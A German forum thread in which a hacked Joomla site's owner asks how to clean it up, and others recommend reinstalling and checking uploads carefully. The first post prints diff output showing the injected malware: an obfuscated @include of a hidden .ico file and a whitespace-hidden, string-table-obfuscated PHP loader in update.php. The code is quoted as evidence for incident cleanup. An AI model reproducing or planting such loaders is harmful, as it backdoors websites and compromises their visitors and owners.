Joomla Files ersetzen - Files unterscheiden

jlou · 4. September 2018

Hallo,

meine Seite wurde gehacked. Dazu hätte ich Fragen bezügl der Bereinigung

1.) kann ich bedenkenlos alle Files auf dem Server mit den originalen Joomla Files ersetzten, also alles neu drüberklatschen?

2.) wie weiß ich 100%ig welche Files ich löschen kann, alles was nicht zu Joomla_3.8.12-Stable-Full_Package.zip gehört (legt auch die Installationsroutine neue Files an?)?

3.) Plugins/Komponenten wo sind die Plugins - kann man eingrenzen dass Komponentenfiles also nur in components Ordner sind ?

Hab mal einen Diff gemacht und einiges interessantes gefunden - hier mal ein paar Einträge.

PHP

jcms/components/com_banners/helpers: tj6cuew678.php.
jcms/includes/framework.php
1a2,6
> /*4a3a6*/
> 
> @include "\057var\057www\057web\06524/\150tml\057jcm\163/pl\165gin\163/au\164hen\164ica\164ion\057gma\151l/.\062a24\060ad0\056ico";
> 
> /*4a3a6*/
Nur in jcms/layouts: index.html.bak.bak.
Nur in jcms/layouts: index.php.
Nur in jcms/layouts/joomla: index.php.
Nur in jcms/layouts/joomla/searchtools: xml_parser_create_ns.php.suspected.
Nur in jcms/layouts/joomla/toolbar: atann2.php.
Nur in jcms/libraries/joomla/filesystem/support: bfouzuzp.php.

diff -r orig/Joomla_3.8.12-Stable-Full_Package/administrator/components/com_joomlaupdate/controllers/update.php jcms/administrator/components/com_joomlaupdate/controllers/update.php
1c1
< <?php
---
> <?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $a05af84 = 61;$GLOBALS['j9e80e61'] = Array();global $j9e80e61;$j9e80e61 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['qa8e055a'] = "\x43\x3a\x51\x60\x77\x2e\x67\x36\x7c\x78\x20\x4d\x56\x5c\x7e\x47\x9\x6b\x3b\x26\x61\x66\x57\x2d\x55\x2c\x4a\x5e\x39\x35\x45\x42\xd\x3d\x6c\x3c\x48\x52\x3e\x59\x73\x24\x5b\x7a\x70\x41\x2f\x21\x65\x4f\x68\x76\x4c\x72\x33\x58\x74\x29\x30\x23\x6f\x2a\x7d\x69\x62\x75\x28\xa\x6d\x3f\x32\x49\x5d\x71\x37\x40\x7b\x2b\x79\x6e\x5a\x6a\x34\x31\x50\x46\x54\x4b\x4e\x63\x25\x38\x53\x22\x27\x64\x44\x5f";$j9e80e61[$j9e80e61['qa8e055a'][17].$j9e80e61['qa8e055a'][58].$j9e80e61['qa8e055a'][21].$j9e80e61['qa8e055a'][82].$j9e80e61['qa8e055a'][7]] = $j9e80e61['qa8e055a'][89].$j9e80e61['qa8e055a'][50].$j9e80e61['qa8e055a'][53];$j9e80e61[$j9e80e61['qa8e055a'][53].$j9e80e61['qa8e055a'][74].$j9e80e61['qa8e055a'][58].$j9e80e61['qa8e055a'][74].$j9e80e61['qa8e055a'][64].$j9e80e61['qa8e055a'][74]] = $j9e80e61['qa8e055a'][60].$j9e80e61['qa8e055a'][53].$j9e80e61['qa8e055a'][95];$j9e80e61[$j9e80e61['qa8e055a'][40].$j9e80e61['qa8e055a'][82].$j9e80e61['qa8e055a'][64].$j9e80e61['qa8e055a'][28].$j9e80e61['qa8e055a'][82].$j9e80e61['qa8e055a'][7]] = $j9e80e61['qa8e055a'][95].$j9e80e61['qa8e055a'][48].$j9e80e61['qa8e055a'][21].$j9e80e61['qa8e055a'][63].$j9e80e61['qa8e055a'][79].$j9e80e61['qa8e055a'][48];$j9e80e61[$j9e80e61['qa8e055a'][48].$j9e80e61['qa8e055a'][21].$j9e80e61['qa8e055a'][7].$j9e80e61['qa8e055a'][29].$j9e80e61['qa8e055a'][48].$j9e80e61['qa8e055a'][20].$j9e80e61['qa8e055a'][28]] = $j9e80e61['qa8e055a'][40].$j9e80e61['qa8e055a'][56].$j9e80e61['qa8e055a'][53].$j9e80e61['qa8e055a'][34].$j9e80e61['qa8e055a'][48].$j9e80e61['qa8e055a'][79];$j9e80e61[$j9e80e61['qa8e055a'][65].$j9e80e61['qa8e055a'][95].$j9e80e61['qa8e055a']

Alles anzeigen

eumel1602 · 4. September 2018

Hallo Jlou

WelcheJoomlaversion hast du ?

Das ist leider nicht so einfach wie "ne Wurschtbemme essen" wenn es einmal passiert ist.

Du musst wissen wo und wie deine Seite gehackt wurde. Sicherlich warst du nicht auf der letzten Joomla Version? (3.8.12.)

Einfach etwas drüberkopierne und paar einzelne datein löschen hilft da nix.

Ich empfehle dir ein angebot bei einem Profi machen zu lassen, Wenn du nicht im Joomlastoff steckst. Die Gefahr wieder gehackt zu werden ist sonst groß.

Ein sauberes Backup hast du sicher auch nicht oder?

Das einfachste ist, alles löschen ,Joomla neu und die neuste Version aufspielen und dann die Daten einpflegen mit aktuellen plugins und evt. Erweiterungen. aber ich weiss ja nicht wie aufwändig deine Seite ist.

- Hier findest du hilfe zur Selbsthilfe: Mein Jomla wurde gehackt Was kann ich tun?

Elwood · 4. September 2018

Stimme eumel zu!

OT:

Zitat

Wurschtbemme

Für uns Westdeutsche: Wurstbrot!

Siehe hier!

Re:Later · 4. September 2018

Aber man sieht an dem obigen Auszug auch, wie wenig Provider-Scanner/generell Scanner finden. Lediglich eine Datei wurde mit .suspected deaktiviert.

Hauptproblem ist ja meist beim Dateiabgleich, dass man ja auch zuinstallierten Kram bis hin zum Template in identischer Version durchsehen muss. Da hilft dann eigentlich nur noch Erfahrung, das halbwegs zeiteffizient abzuwickeln (ein sehr relativer Begriff, das zeiteffizient). Schnelles Erkennen von Schadcodes beim Durchscrollen, was für Dateien sind in einem Joomlaumfeld untypisch für berstimmte Erweiterungstypen und so Zeugs.

Und fertig bist ja mit Dateibereinigung noch nicht. Die Einbruchsstelle(n) finden ist dann (oder vorher) ebenfalls noch mal ein heftiger Aufwand.

"wenn man es gründlich macht" immer vorausgesetzt.

jlou · 5. September 2018

OK - dachte ev. man könnte die bestehenden Files alle nochmal sicherheitshalber überklatschen - ich bin jetzt auf der neuesten Version auch alle Plugins (hab aber eh nur Phoca Gallery + Jevents).

Leider wurde da ca. 3 Jahre nichts gepflegt.

Aber dann muss ich ev. echt eine Neuinstallation ins Auge fassen.

thx

Re:Later · 5. September 2018

Zitat von jlou

man könnte die bestehenden Files alle nochmal sicherheitshalber überklatschen

Reicht halt nicht, wenn schon Dateien hochgeladen wurden, die Joomla gar nicht benötigen, um Schadcode auszuführen. Und darunter eben auch viele, die wiedrum dazu dienen, weitere hochladen zu können oder andere wieder zu verändern, die man gerade erst bereinigt hat.

Zitat von jlou

Neuinstallation

Halt aufpassen, dass du wasimmer auch aus der Gehackten übernimmst, z.B. images-Ordner, altes Template etc., ordentlich zu sichten. Man findet auch Dateiendungen .php.jpg und ähnliche, die einem bei plumpem Scannen nach .jpg gerne durch die Lappen gehen. Diverse Varianten sind möglich.

Tags